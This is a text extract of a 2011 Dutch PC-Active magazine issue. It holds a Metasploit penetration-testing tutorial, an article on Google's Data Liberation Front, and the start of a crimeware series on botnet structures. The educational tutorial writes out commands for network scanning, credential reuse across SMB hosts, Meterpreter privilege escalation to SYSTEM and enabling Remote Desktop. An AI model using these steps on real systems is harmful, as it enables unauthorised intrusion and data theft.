Sleutels kraken Sleutels spelen een essentiële rol in zowel symmetrische als asymmetrische cryptografie. Vooral de grootte van de sleutels is belangrijk voor de veiligheid: hoe minder bits, hoe minder tijd een aanvaller nodig heeft om gewoon alle sleutels uit te proberen om een boodschap te ontcijferen. Maar mensen kunnen heel moeilijk sleutels onthouden, omdat dit getallen zijn. Daarom zijn wachtwoorden uitgevonden, die door een algoritme omgezet worden in een sleutel die bruikbaar is voor het encryptiealgoritme. En ook hier geldt: hoe minder tekens er in het wachtwoord zitten, hoe gemakkelijker dit te kraken is door een aanvaller die gewoon alle mogelijke wachtwoorden probeert. Daarom gaan we volgende maand hier dieper op in. We bekijken wat de state-of-the-art is van het kraken van sleutels en wachtwoorden, en laten u zien hoe u een goed wachtwoord kiest dat niet onmiddellijk te kraken is.
PC-ACTIVE | Nr. 245 – 2011
506 Encryptie.indd 77
77
10-02-2011 15:29:44
TEST UW BEVEILIGING MET EXPLOITS
METASPLOIT TEKST : KOEN VERVLOESEM
In 2003 begon beveiligingsspecialist HD Moore met Metasploit, een project dat informatie verzamelde over beveiligingsfouten. Vooral bekend is het subproject Metasploit Framework, een tool waarmee penetration testers exploits kunnen uitvoeren op kwetsbare computers. We laten u zien hoe dat werkt.
H
et Metasploit Framework, een tool waarmee de kwetsbaarheid van een systeem is te testen, is uitgegroeid tot het de facto-hulpmiddel om exploits voor beveiligingsproblemen te ontwikkelen. Heel wat security advisory’s worden tegenwoordig zelfs van een proofof-concept exploit voorzien die geschreven is als Metasploit-module om de ernst van de fout aan te tonen. In oktober 2009 is Metasploit door het beveiligingsbedrijf Rapid7 overgenomen en verder ontwikkeld. Naast het open-source Metasploit Framework biedt het bedrijf ook commerciële versies Metasploit Express en Metasploit Pro aan, die beide extra geavanceerde mogelijkheden hebben. In dit artikel demonstreren we Metasploit als onderdeel van de Linux-distributie Backtrack 4. Dit is een live Linux-distributie – eenvoudig te proberen zonder het op uw computer te installeren –, die is gespecialiseerd in beveiligingstools. Het programma heeft verscheidene interfaces, zowel commandline als grafische. Het spreekt overigens voor zich dat we met dit artikel niet willen aanzetten tot illegale praktijken: gebruik Metasploit niet om exploits uit te voeren op computers van iemand anders, maar doe dit louter op uw eigen computers. We leggen Metasploit in dit artikel uit voor educatieve doeleinden: we hopen dat u na dit artikel een beter inzicht hebt in hoe beveiligingsexploits worden gebruikt. Test u dit op uw eigen computers, dan ontdekt u misschien ook nog wat kwetsbaarheden die u vergeten bent op te lossen...
78
Aan de slag De meerderheid van de exploits die het Metasploit Framework bevat, richten zich op Windows-systemen, dus het is handig een Windows-systeem bij de hand hebben om ze op te testen. We raden u aan om hiervoor een verse Windows-installatie uit te voeren in een virtuele machine, zodat het kwetsbare systeem niet voor gaten zorgt in de beveiliging van de computersystemen die u dagelijks gebruikt. De ontwikkelaars bieden echter ook een VMware virtuele machine met de naam Metasploitable aan op de website van Metasploit. Deze machine is een Ubuntu-systeem dat een aantal kwetsbare diensten draait zodat u hierop Metasploit kunt proberen. De virtuele schijf is bovendien niet-blijvend, zodat alle schade die u aan het systeem toebrengt na een virtuele reboot verdwenen is. Wij installeerden Metasploitable in één virtuele machine en Backtrack in een andere, beide onder VirtualBox. Voor Metasploitable moesten we wel de IO APIC inschakelen in de virtuele machine, anders brak de Linux-kernel tijdens het booten af met een kernel panic. Het vmdk-bestand van Metasploitable kunt u gewoon als nieuwe virtuele harde schijf toevoegen in VirtualBox, waarna u een Linux VM aanmaakt met deze harde schijf als opstartschijf. Een tip: update Metasploit regelmatig, zodat u de nieuwste exploits en andere modules hebt. In Backtrack gaat dit als volgt door de nieuwste versie via Subversion te updaten: svn update /opt/metasploit3/msf3/
PC-ACTIVE | Nr. 245 – 2011
504 metasploit.indd 78
10-02-2011 13:43:34
METASPLOIT
Het Metasploit Framework biedt meerdere interfaces aan, en elk heeft zo zijn voordelen. De eenvoudigste is msfcli, een commandline-interface. Als argumenten geeft u hier achtereenvolgens de naam van de exploit, eventuele opties en hun waarden en de modus. Met msfcli -h krijgt u de verschillende modi te zien. E is om de exploit uit te voeren, en er zijn nog heel wat modi om informatie over de module te tonen, zoals O voor de beschikbare opties, P voor de beschikbare payloads, enzovoorts. Msfcli is heel handig als u exact weet welke exploit u wilt uitvoeren, en kan door zijn eenvoudige syntax ook in scripts worden gebruikt om aanvallen te automatiseren. De meest flexibele interface is echter msfconsole, een commandline programma dat een interactieve shell aanbiedt waarmee u toegang hebt tot alle acties en opties van het Metasploit Framework. Na het opstarten toont het programma u hoeveel exploits en payloads het kent en hoe recent ze zijn. Het commando help toont u een overzicht van de beschikbare commando’s. U kunt in msfconsole bovendien ook externe opdrachten uitvoeren, zoals ping: geeft u een opdracht in die niet als interne opdracht bekend is door msfconsole, dan probeert het deze opdracht in de shell van uw besturingssysteem uit te voeren. En het commando irb opent een Ruby-shell (Metasploit is geschreven in de programmeertaal Ruby), die u kunt gebruiken om ter plekke zelf Metasploit-scripts te maken. De shell van msfconsole heeft alle moderne faciliteiten die u maar zou willen. Handig is bijvoorbeeld tab completion: terwijl u een commando aan het intypen bent, kunt u op tab drukken om het verder aan te vullen, zodat u alle mogelijke voltooiingen te zien krijgt. Dit werkt voor commando’s, voor namen van exploits, voor hosts, enzovoorts. Plug-ins kunt u laden met load. Het commando resource laat u toe om een script uit te voeren dat een opeenvolging is van een reeks
| SOFTWARE
Metasploit-commando’s. Dit is handig als u eenmaal de commando’s hebt bepaald die u moet uitvoeren voor een specifieke taak: dan zet u deze gewoon achter elkaar in een tekstbestand en laadt u dit bestand in msfconsole in met het commando resource om de commando’s uit te voeren. Als u een bepaalde module hebt gekozen (te zoeken met het commando search), gebruikt u deze door het commando use . Daarna verandert de opdrachtprompt om te tonen dat u in de context van die module werkt. Met de commando’s set en unset kunt u opties en parameters instellen of weer wissen. Met setg stelt u een globale variabele in, die dan in alle contexten van msfconsole dezelfde waarde heeft. Met show options krijgt u de opties van de huidige module te zien, en show encoders toont u de mogelijke encoders die u kunt gebruiken om een payload uit te voeren. Met set encoder stelt u deze dan in. Het commando show kan nog allerlei andere zaken tonen, zoals exploits, payloads, et cetera. Een ander belangrijk commando in msfconsole is sessions, waarmee u kunt werken met verschillende sessies. Hebt u bijvoorbeeld een shell exploit met succes uitgevoerd, dan hebt u toegang tot een shell sessie op uw doel. Met sessions -l krijgt u een lijst met alle beschikbare sessies in msfconsole, en met sessions -i 1 schakelt u over naar interactie met sessie 1.
Kennis is macht De eerste stap van het uitvoeren van een exploit is altijd informatie inwinnen over uw doel. Als het om verschillende doelen gaat, bijvoorbeeld een heel netwerk, loont het om de informatie die u inwint in een databank bij te houden. Msfconsole heeft daarom integratie met PostgreSQL, MySQL en SQLite3 ingebouwd. We gebruiken in ons voorbeeld SQLite3 omdat dit het gemakkelijkste is, maar deze optie is
Met msfcli kunt u snel exploits uitvoeren
PC-ACTIVE | Nr. 245 – 2011
504 metasploit.indd 79
79
10-02-2011 13:44:21
SOFTWARE
| METASPLOIT
Met msfconsole biedt het Metasploit Framework een interactieve shell aan voor exploits
niet ondersteund. Voer de volgende commando’s uit in msfconsole: db_driver sqlite3 db_connect load db_tracker Dan kunnen we bijvoorbeeld met Nmap het hele netwerk scannen en de resultaten in de databank zetten: db_nmap -v -sV 192.168.1.0/24 Nu kunnen we de gevonden hosts bekijken: db_hosts Of alle gevonden services: db_services Nu kunt u zich focussen op het verder onderzoeken van de gevonden services. Dat kan met bijvoorbeeld nmap, maar ook met de scanner-modules van Metasploit. Zoek maar eens naar de beschikbare scanners met search scan. U kunt bijvoorbeeld scanner/ smb/smb_version gebruiken om de Windows-versies (of Samba-versies onder Linux) te detecteren, of scanner/ssh_ssh_version om de versie van de ssh-server te detecteren. Naderhand is de versieinformatie aan de databank toegevoegd: use scanner/smb/smb_version set RHOSTS 192.168.0.0/24 set THREADS 50 run Overigens hoeft u bij een module de ip-adressen van de doelen niet altijd in msfconsole zelf in te stellen. Hebt u bijvoorbeeld een lijst van ip-adressen in een bestand staan, dan kunt u deze in msfconsole gebruiken met het commando set RHOSTS file:bestandsnaam.
80
Kwetsbaarheden scannen Als u eenmaal ontdekt hebt welke services er op een computer draaien, komt het erop aan om te scannen welke kwetsbaarheden er in die services zitten. Stel dat u bijvoorbeeld een gebruikersnaam en bijbehorend wachtwoord hebt ontdekt – van welke dienst dan ook –, dan is de kans groot dat die persoon dezelfde gebruikersnaam en wachtwoord ingesteld heeft voor andere diensten. En dan kunt u deze combinatie proberen bij alle diensten op alle computers op het netwerk, bijvoorbeeld voor SMB (Windows shares): use scanner/smb/smb_login set RHOSTS 192.168.0.0/24 set THREADS 50 set SMBUser gebruiker set SMBPass wachtwoord run Uiteindelijk krijgt u dan te zien bij welke computers de combinatie van gebruikersnaam en wachtwoord succesvol is. U kunt zo ook zoeken naar VNCservers die zonder wachtwoord draaien (use scanner/ vnc/vnc_none_auth), X11-servers die gebruikers zonder authenticatie toelaten (use scanner/x11/open_x11), ftpservers die anonieme toegang toelaten (scanner/ftp/ anonymous), et cetera.
Exploits Metasploit kent twee types exploits: actieve en passieve. Actieve exploits zijn het eenvoudigste: voer use uit, stel de benodigde opties in en voer het commando exploit uit. Daarna doet de Metasploitmodule zijn werk en buit de beveiligingsfout uit, waarna u bijvoorbeeld een shell te zien krijgt als het
PC-ACTIVE | Nr. 245 – 2011
504 metasploit.indd 80
10-02-2011 13:45:52
METASPLOIT
| SOFTWARE
Msfconsole geeft een overzicht van de services die volgens Nmap draaien
om een shell exploit gaat. Bij een passieve exploit doet u hetzelfde, maar krijgt u niet onmiddellijk een shell: deze exploit kan bijvoorbeeld pas worden uitgevoerd wanneer de gebruiker op de doelcomputer een specifieke actie uitvoert, zoals zijn browser opstarten. Kijk daarom regelmatig met sessions -l of de exploit een sessie heeft geopend en schakel dan over naar die sessie met sessions -i . Hebt u eenmaal toegang tot de computer dankzij een exploit, dan zijn er allerlei interessante zaken die u kunt doen, en daarbij helpt het programma Meterpreter u. Zo kan het bijvoorbeeld zijn dat de gebruiker waarmee u ingelogd bent op een Windows-systeem geen SYSTEM-privileges heeft. Met console Meterpreter kunt u dit zien: het commando getuid geeft dan een normale gebruiker als resultaat. Daarna kunt u met de commando’s use priv en getsystem Meterpreter allerlei methodes laten uitvoeren om SYSTEM-privileges te verkrijgen. Heeft dit succes, dan krijgt u met getuid SYSTEM te zien als gebruikersnaam. Verder kunt u ook Remote Desktop inschakelen met het Meterpreter-commando run getgui -u gebruikersnaam -p wachtwoord. Daarna kunt u via een remote desktop toepassing de desktop van de computer besturen. Meterpreter biedt nog heel wat handige commando’s aan, zoals ps om de proceslijst van de computer te bekijken, het commando screengrab om een screenshot van de desktop te nemen, of search om naar bestanden te zoeken waarvan de naam een bepaald patroon volgt, of download en upload om bestanden van de computer te downloaden of naar de computer te uploaden. Met shell opent u een shell op de computer en met execute draait u een willekeurig programma.
En verder We hebben in dit artikel echt maar de basis van Metasploit besproken. Zo biedt het framework bijvoorbeeld ook heel wat mogelijkheden om een payload op verschillende manieren te coderen zodat intrusion prevention systemen uw aanvallen niet herkennen. Verder biedt Armitage een handige grafische interface voor Metasploit. Ze werkt zowel op Linux als Windows en vereist de installatie van Metasploit Framework 3.5 en Sun Java 1.6 (niet OpenJDK dat veel Linux-distributies gebruiken). Voor wie meer uitleg over Metasploit wil, is de online handleiding Metasploit Unleashed zeker aan te raden. Daar staan ook geavanceerde zaken in zoals het zelf ontwikkelen van exploits, het uitbreiden van Metasploit en allerlei tips over wat u kunt doen als u eenmaal een exploit shell hebt op uw doel.
Google heeft een team met de naam Data Liberation Front dat ervoor moet zorgen dat elke Google-tool zijn gebruikers de mogelijk biedt om hun gegevens te exporteren, zodat ze niet in Google opgesloten blijven. Deze doelstelling is nog niet 100 % behaald, maar de intentie is er, wat al meer is dan bij veel andere bedrijven. In dit artikel leest u welke vragen u moet stellen voordat u uw gegevens aan een bedrijf toevertrouwt.
W
aarschijnlijk gebruikt u net zoals de meeste internetters dagelijks verschillende Google-producten. Ze zijn namelijk zo goed, en het is zo gemakkelijk om uw gegevens altijd bij de hand te hebben ‘in de cloud’. Als u echter na een tijdje niet meer tevreden bent en wilt overstappen naar een ander product, komt de vraag die u zich eigenlijk al had moeten stellen vóórdat u de dienst ging gebruiken: hoe krijg ik mijn gegevens er weer uit? Veel fabrikanten van software en diensten leveren wel de mogelijkheden om uw gegevens uit producten van concurrenten te importeren in hun product, maar in de andere richting bieden ze vaak toevallig weinig of geen mogelijkheden aan. Niet bij Google: daar waakt een speciaal team met de naam Data Liberation Front ervoor dat de diensten
van Google uw gegevens niet gevangen kunnen houden. Hun missie is: ‘Gebruikers zouden de controle moeten behouden over de gegevens die ze in één van Google’s producten opslaan. Ons team heeft als doel om het gemakkelijker te maken om gegevens in en uit te verplaatsen.’ Zij hebben ook een interessante website op www.dataliberation.org, waar zij hun filosofie uitleggen en een overzicht geven van de ‘data liberation’-mogelijkheden van Google-producten.
Drie vragen Nog vóór u een computerprogramma, website of dienst gaat gebruiken, zou u volgens de mensen van het Data Liberation Front de volgende drie vragen moeten stellen over uw gegevens: 1. Kan ik mijn gegevens er weer uit krijgen? 2. Hoeveel geld gaat het me kosten om mijn gegevens er uit te krijgen? 3. Hoeveel tijd gaat het me kosten om mijn gegevens er uit te krijgen? In het ideale geval kunt u deze vragen als volgt beantwoorden: 1. Ja. 2. Niet meer dan wat ik nu voor de dienst betaal. 3. Zo weinig mogelijk.
Google’s Data Liberation Front
82
Als u op de eerste vraag al ‘nee’ antwoordt, dan is het gebruik van het product helemaal niet aan te raden, tenzij u een heel goede reden hebt. Als u uw gegevens immers helemaal niet uit het product kunt halen in een vorm die door andere producten bruikbaar is, dan kunt u enkel bij uw eigen gegevens via dit product. Dit is pure lock-in: beslist de producent plots om het
PC-ACTIVE | Nr. 245 – 2011
501 Data liberation front.indd 82
10-02-2011 14:51:52
DATA LIBERATION FRONT
product duurder te maken, dan hebt u de keuze tussen een woekerprijs betalen of uw gegevens verliezen. En als de producent failliet gaat, dan kunt u helemaal naar uw gegevens fluiten. Gelukkig zijn heel wat producenten hier gevoelig voor en bieden zij wel een mogelijkheid aan om uw gegevens te exporteren. Helaas is niet iedereen hier eerlijk in: u moet dan bijvoorbeeld extra betalen op het moment dat u uw gegevens terug wilt hebben. En dat voor gegevens die eigenlijk van u zijn, niet van die producent! Andere spelen het spelletje subtieler en bieden zoals het hoort gratis een exportmogelijkheid, maar draaien die op een trage server zodat het enorm lang duurt voor u al uw gegevens hebt, zodat een twijfelende gebruiker het misschien opgeeft en het product toch blijft gebruiken.
Foto per foto Een voorbeeld van hoe het niet moet, is te vinden bij Kodak Photo Gallery, een website waar iedereen zijn foto’s kan beheren. Op een bepaald moment besloot het bedrijf dat te weinig gebruikers betaalden voor de extra diensten, en kregen die personen een bericht dat hun foto’s over twee weken verwijderd zouden worden als ze niet voor een betalende dienst zouden kiezen. Oké, iedere gebruiker van een gratis dienst weet dat dit ooit kan gebeuren. Het ergste was echter dat Kodak aan de gebruikers die niet verder wilden geen eenvoudige mogelijkheid bood om hun foto’s uit de Kodak Photo Gallery te halen. Ja, u kon één voor één op elke foto klikken om ze te downloaden, maar voor wie duizenden foto’s aan Kodak Photo Gallery toevertrouwd had, was dat geen optie. Grootgebruikers werden zo quasi verplicht om te betalen. Gelukkig waren er wat slimmeriken die scriptjes schreven om alle foto’s te downloaden, maar dat was niet voor iedereen weggelegd. Flickr, de populairste website van dit moment om foto’s te delen, zit in dezelfde situatie: u kunt niet uw hele collectie tegelijk downloaden. Wil u al uw foto’s, dan moet u op de website één voor één op uw foto’s klikken, ‘All sizes’ kiezen en dan de hogeresolutieversie downloaden. Met third-party programma’s zoals FlickrDown kunt u wel in één keer uw volledige collectie downloaden. Facebook heeft hetzelfde probleem: er is geen mogelijkheid in Facebook zelf voorzien om uw contacten, foto’s en video’s van uw Facebook-profiel in één keer te downloaden. Om te importeren natuurlijk wel... Wilt u deze gegevens, dan moet u dus naar externe tools op zoek, zoals extensies voor Firefox of Google Chrome, of third-party Facebook-applicaties. Het is dus wel mogelijk, maar vereist wat zoekwerk.
Weg van Google Het Data Liberation Front is in begin 2007 ontstaan om lock-in tegen te gaan in Google-producten. De
| ACHTERGROND
Bevrijd uw gegevens
zoekgigant vindt het immers belangrijk dat het zijn gebruikers niet gevangen houdt: als u om welke reden dan ook Google niet meer leuk vindt, maakt het bedrijf het heel eenvoudig om naar een concurrent over te stappen. Volgens de mensen van het Data Liberation Front behoudt een bedrijf immers op lange termijn meer gebruikers als het innoveert en als het gebruikers kan houden omdat ze bewust kiezen voor het product, niet omdat ze er ondertussen in gevangen zijn. En het kan goed zijn dat u bijvoorbeeld stopt met Gmail te gebruiken, maar dat u later geïnteresseerd geraakt in Google Calendar. Als uw ervaring om van Gmail te migreren niet zo leuk was door de lock-in, is de kans klein dat u nog zin hebt in Google Calendar. Als u echter heel eenvoudig uw e-mail kunt exporteren (zoals nu mogelijk is), dan zult u ondanks uw beslissing om met Gmail te stoppen nog vrij positief tegenover Google staan. Het is dus ook in het voor-
Uw foto’s in Flickr zult u zelf één voor één moeten downloaden deel van Google dat het data liberation aanbiedt. Op www.dataliberation.org/google vindt u een lijst van de Google-producten die al een mogelijkheid aanbieden om uw gegevens eruit te halen. Klikt u op een dienst in de lijst, dan komt u op een pagina terecht met een korte uitleg en links naar meer informatie. In het algemeen maken die mogelijkheden zoveel mogelijk gebruik van bestaande open standaarden. We bekijken de belangrijkste. Laten we beginnen met Gmail, de bekendste dienst die Google aanbiedt naast zijn zoekmachine. Gmail laat toe om via imap en pop uw e-mails in te lezen, waardoor u niet tot de webinterface beperkt bent. Zo
PC-ACTIVE | Nr. 245 – 2011
501 Data liberation front.indd 83
83
10-02-2011 14:52:26
ACHTERGROND
| DATA LIBERATION FRONT
kunt u perfect Gmail gebruiken met een e-mailclient op de desktop of op uw smartphone. De ondersteuning van pop en imap kan ook worden gebruikt om uw hele e-mailcollectie te downloaden als u wilt stoppen met Gmail: u moet gewoon uw Gmail-account toevoegen in een nieuwe e-mailclient en instellen dat de client alle mail downloadt, en eventueel daarna de mails van de servers van Google verwijdert. Om een overstap nog gemakkelijker te maken, biedt Google ook auto-forwarding aan: wanneer nog niet iedereen uw nieuwe e-mailadres kent, kunt u uw Gmail-adres laten forwarden naar uw nieuwe adres, zodat u geen e-mails mist. Als u door de jaren heen uw hele agenda met afspraken in Google Calendar hebt gemaakt en nu een andere dienst of programma hiervoor wilt gebruiken, hoeft u ook niet te wanhopen. U kunt een specifieke kalender exporteren door in de linkerzijbalk van Google Calendar op het omgekeerde driehoekje naast de kalender te klikken en dan op agenda-instellingen te klikken. Daar klikt u op het groene ical-icoontje bij het privé-adres om de url op te vragen waarop u het ics-bestand kunt downloaden. Als u meerdere agenda’s aangemaakt hebt, kunt u deze allemaal in één keer exporteren door naar de instellingenpagina van Google Calendar te gaan en onderaan Mijn agenda’s op Agenda’s exporteren te klikken. Het resultaat is een zip-bestand met daarin voor elke agenda een ics-bestand. Als u het beu bent om al uw documenten ‘in the cloud’ op te slaan, blijkt dat Google Docs een toonbeeld van data liberation is: u selecteert gewoon één of meerdere documenten en klikt dan op Export in het menu ‘More Actions’. Daarna kunt u het bestandsformaat
Google hypocriet? Google is natuurlijk geen heilige en dit artikel is zeker geen oproep om al uw gegevens aan de Amerikaanse zoekgigant toe te vertrouwen. Ondanks zijn motto ‘Don’t be evil’ en ondanks de lovende praktijk van data liberation kwam het bedrijf al verschillende keren in opspraak omwille van privacyinbreuken en censuur. Cookies tracken de zoekgeschiedenis van gebruikers, Street View geeft iedereen een kijkje in uw voortuin, en de wagens die rondreden voor het fotograferen van de Street View beelden verzamelden ‘toevallig’ ook 600 GB aan data van publieke wifi-netwerken, inclusief fragmenten van e-mails. Berucht is ook de uitspraak van Google CEO Eric Schmidt die in december 2009 zei dat wie iets doet wat hij aan niemand wil laten weten, dat misschien in de eerste plaats niet moet doen. Dat is natuurlijk heel kort door de bocht van Schmidt. Kortom, het komt wel wat hypocriet over van Google om enerzijds allerlei zaken met onze gegevens te doen die niet koosjer zijn, maar anderzijds wel te pronken met het feit dat elke gebruiker zijn gegevens kan terugkrijgen, uiteraard nadat Google er alles uit heeft verwerkt wat interessant kan zijn. Cru gezegd misschien, maar hier komt het wel op neer. Toch is het data liberation project van Google op zich een lovenswaardig initiatief, en het is een lichtend voorbeeld dat heel wat meer bedrijven zouden moeten volgen.
84
kiezen, zoals Microsoft Office, odf, rtf, plaintext, html en pdf. Het resultaat is een zip-bestand met al uw documenten. Google Blogger toont in de instellingen bij ‘Blog Tools’ ‘Export blog’. Dit exporteert uw blogberichten naar het Atom-formaat, een standaard zoals rss voor het syndiceren van nieuws. Het resulterende Atombestand bevat niet alleen alle berichten, maar ook alle commentaren en labels. Dit bestand kunt u dan in een ander blogsysteem importeren. Ook uw lijst met rss-feeds in Google Reader is eenvoudig te exporteren in de vorm van een opml-bestand, dat door zowat alle rss-lezers wordt ondersteund. En als u kaarten die u in Google Maps hebt opgeslagen in een ander programma wilt openen, dan kan dat ook. Het resultaat is een kml-bestand, dat door heel wat geografische software ondersteund wordt. In AdWords kunt u uw gegevens in het File-menu exporteren naar verschillende formaten, zoals csv (comma separated values) of een zip-bestand van een csv-bestand met afbeeldingen, of een html-bestand met een overzicht van uw AdWords-account. Een Google Analytics-rapport kunt u niet alleen exporteren naar pdf, maar ook naar csv, xml of xls. In Google Alerts toont de pagina Manage Your Alerts rechtsboven een link ‘Export alerts’, waarmee u een csv-bestand met uw ingestelde alerts krijgt. En uw bladwijzers in Google Bookmarks of in Google Chrome kunt u exporteren naar een html-document. Ook uw contacten van in GMail kunt u exporteren, naar csv- of vCard-formaat. En wanneer u de financiele informatie van Google Finance in een ander programma wilt bekijken, hoeft u maar uw portfolio te downloaden in de vorm van een csv- of ofx-bestand. Ofx (Open Financial Exchange) is een standaardformaat voor financiële informatie, onder andere ondersteund door Microsoft, Intuit en CheckFree.
Wat met dode projecten? Dat het Google menens is met data liberation, werd duidelijk toen het Google Wave (zie ook PC-Active 234) eind vorig jaar stopzette. Gebruikers kregen toen een paar maanden tijd om hun waves te exporteren. Bovendien pushte Google het project ‘Wave in a Box’, een onafhankelijke verderzetting van het idee van Google Wave in een open-sourceproject. Gebruikers van Wave in a Box kunnen hun waves uit Google Wave importeren als ze die eind 2010 geëxporteerd hebben. Google heeft dus op twee vlakken gezorgd dat gebruikers niet in de kou bleven staan nadat het geen toekomst meer zag in Google Wave: het heeft zijn product open source gemaakt zodat anderen het verder kunnen blijven gebruiken en ontwikkelen, én het heeft de gegevens overdraagbaar gemaakt naar het nieuwe open-sourceproject. Het is een voorbeeld dat navolging verdient voor andere bedrijven die eraan denken om een product stop te zetten.
PC-ACTIVE | Nr. 245 – 2011
501 Data liberation front.indd 84
10-02-2011 14:53:00
DATA LIBERATION FRONT
| ACHTERGROND
Download al uw documenten van Google Docs
Andere goede voorbeelden Een ander goed voorbeeld van hoe het moet, is WordPress: als u jaren uw blog op WordPress.com of een ander WordPress hostingplatform hebt staan en u om welke reden dan ook ervan weg wilt, moet u maar naar de beheerderssectie van uw blog gaan, op Tools klikken en dan Export kiezen. Zo kunt u een eigen WordPress-blog opzetten en de inhoud van uw oude blog importeren, maar er zijn ook genoeg andere blogsystemen die zo’n geëxporteerde WordPress-blog kunnen importeren. WordPress gaat zelfs verder en biedt voor US$ 5 per jaar de dienst Offsite Redirect aan, waardoor u alle url’s op uw oude blog nog tijdelijk kunt laten verwijzen naar uw nieuwe blog. Contacten zijn in de meeste programma’s of diensten wel eenvoudig te exporteren. In de webinterface van Windows Live Mail bijvoorbeeld vindt u Export Contacts in het onderdeel Options | More Options. Het resultaat is een csv-bestand. En op de Contactspagina van LinkedIn vindt u onderaan rechts een knopje ‘Export connections’, waar u uw contacten als csv- of vCard-bestand kunt downloaden.
Google als voorbeeld Ondanks het feit dat Google op andere domeinen bedenkelijke zaken doet, heeft de zoekgigant op vlak van data liberation het beste voor met gebruikers. Dit
is een voorbeeld dat door anderen zoals Microsoft en Apple eigenlijk ook gevolgd zou moeten worden. Want steeds meer bedrijven vinden het vanzelfsprekend dat uw gegevens hun eigendom worden, en dat u geen recht hebt op het terugkrijgen van uw gegevens. Als u gebruiker bent van een dienst van zo’n bedrijf, klaag dan hard en vraag een mogelijkheid om uw gegevens terug te krijgen. Beter nog is het zo’n diensten links te laten liggen. En vergeet niet: uw gegevens zijn uw eigen verantwoordelijkheid, dus u moet zelf de juiste beslissingen nemen.
INFORMATIE Data Liberation Front http://www.dataliberation.org/ Haal uw gegevens uit Google http://www.dataliberation.org/google Data Liberation Blog http://dataliberation.blogspot.com/ The Case Against Data Lock-in http://queue.acm.org/detail.cfm?id=1868432 Look After Your Data http://www.lookafteryourdata.com
PC-ACTIVE | Nr. 245 – 2011
501 Data liberation front.indd 85
85
10-02-2011 14:53:20
CRIMEWARE-TECHNIEKEN (3)
VAN MALWARE NAAR CRIMEWARE TEKST : PIE TER - CORNELIS AVONTS
In de vorige aflevering van deze serie rond crimeware behandelden we browsergerelateerde aanvallen. Deze maand focussen we ons op een aantal andere, maar niet minder markante crimewaretechnieken.
I
n het eerste deel (zie PC-Active 242) van deze minireeks hebben we het onder meer gehad over de ‘actoren’ van crimeware, waarbij we al snel uitkwamen bij programmeurs van bots en bij botherders, die instaan voor de eigenlijke exploitatie van botnets. In dit derde deel gaan we dieper in op de werking van botnets en zien we welke technieken hun overlevingskansen vergroten. Gezien de populariteit en het opzet van sociale netwerken zal het u niet verbazen dat botnets ook die proberen in te schakelen in hun C&C-constructies. Sociale netwerken zijn echter nog op allerlei andere manieren dankbare kanalen voor cybercriminelen; in dit artikel komen dan ook diverse scenario’s aan bod. Ten slotte hebben we het over een minder bekende aanvalsmethode: het zogenoemde WAPkitting, een techniek die met behulp van wardriving de firmware van AP’s en routers achterhaalt.
Botnets Een bot is een machine die met behulp van geïnstalleerde software van op afstand via een C&C-netwerk (command and control) instructies kan ontvangen – in dit artikel gebruiken we de term ‘bot’ echter ook om naar de software zelf te verwijzen. Die worden dan gewoonlijk zonder medeweten van de gebruiker op die machine (zombie) uitgevoerd. Een botnet is dan de verzameling van alle bots die door eenzelfde C&C worden gedirigeerd. Hoewel het niet altijd om malafide praktijken hoeft te gaan, wordt de term botnet nagenoeg altijd met cybercrime geassocieerd. Botnets worden dan ook voor uiteenlopende misdaadscenario’s ingezet, waaronder DDoS, identiteits-
86
diefstal, spamrelaying, klikfraude, e-mailharvesting, hosting van phishing- en warez-sites, enzovoorts (zie ook deel 1 in PC-Active 242). Botnets maken van verschillende netwerktopologieen gebruik (zie ook http://tinyurl.com/botnet-topologie). Aanvankelijk ging het nagenoeg uitsluitend om stervormige topologieën, met de C&C-server als centrale spil. Zo’n spof-constructie (single point of failure), waarbij de server bovendien wist van alle bots, bleek echter al snel te weinig robuust. Dat besef leidde tot de ontwikkeling van multiserverconfiguraties, met als bijkomend voordeel een betere schaalbaarheid. Aangezien de C&C-servers ook binnen deze topologie nog te kwetsbaar waren, keken botmasters uit naar een hiërarchische constellatie, waarbij bots als proxy voor C&C-instructies naar andere bots konden fungeren. Een nadeel is wel de grotere latentie om instructies over het hele botnet gedistribueerd te krijgen. Een voordeel is dat de C&C-server moeilijker te lokaliseren is en dat het botnet makkelijker uit te splitsen valt voor deelopdrachten (één sectie voor DDoS bijvoorbeeld, een andere voor click jacking). Komt daarbij dat het ip-adres van C&C-servers zelden nog hard-coded in botsoftware zit. Dat gebeurt meer en meer via een dns-query. Bovendien worden in het bijhorende A-record vaak ook nog verschillende ip-adressen opgenomen, of worden de adressen heel frequent aangepast (fast flux). Er zijn ook botnets die daarvoor dynamisch dns-diensten inschakelen, gezien die een domeinnaam heel snel aan een ander ip-adres weten te koppelen. Logischerwijze vloeide deze topologie uiteindelijk uit in een heus ‘random’ netwerk, zonder gecentraliseer-
PC-ACTIVE | Nr. 245 – 2011
508 crimeware 3.indd 86
11-02-2011 09:39:57
CRIMEWARE
de C&C-infrastructuur. Hierbij worden instructies in willekeurige bots geïnjecteerd met de bedoeling dat die automatisch ook naar de andere bots worden gepropageerd. Hoewel het absoluut niet is uitgesloten dat bots zich weldra tot multiprotocollaire clients zullen ontwikkelen – om firewalls om de tuin te leiden die specifieke protocollen of poorten monitoren of blokkeren –, is het momenteel zo dat bots zich op één protocol beroepen voor de communicatie met de C&C-servers. Vooralsnog blijkt het irc-protocol (internet relay chat) erg populair, temeer dit multiserverconstructies ondersteunt en er nogal wat irc-implementaties ter beschikking staan, zoals RDbot en SDbot. Bovendien is de syntax relatief eenvoudig want tekstgebaseerd, ontberen nogal wat irc-netwerken enige degelijke vorm van authenticatie en zijn er anonimiserende tools in omloop. De vraag is echter wel hoelang botmasters zich nog op dit protocol zullen beroepen, aangezien de populariteit van irc zelf afneemt, wat het risico verhoogt dat gebruikers – en firewalls – ircverkeer als verdacht zullen beschouwen. Ook http blijkt een frequent gebruikt protocol in botnets, niet in het minst omdat dit type verkeer vaak onder de radar van firewalls blijft. Een nadeel is wel dat een bot alleen tijdens surfsessies actief kan zijn, maar dat kan wellicht voldoende zijn om de beoogde activiteiten te ontplooien. Op tinyurl.com/clickbota-http vindt u een analyse van zo’n http-gebaseerde bot (Clickbot.A). Instructies van de C&C-server kunnen op verschillende manieren bij zo’n bot komen. Dat kan bijvoorbeeld heel eenvoudig door die (eventueel in de vorm van een uitvoerbaar bestand) op een specifieke locatie op een webserver te plaatsen waar de bot die op gezette tijden ophaalt, maar ook rss-feeds kunnen heimelijk als een C&C-kanaal fungeren. Zo’n bot kan zich overigens ook in een client-side script nestelen. Die moet dan wel zien af te rekenen met het ‘zelfde oorsprong’-beleid zoals dat typisch in
| ACHTERGROND
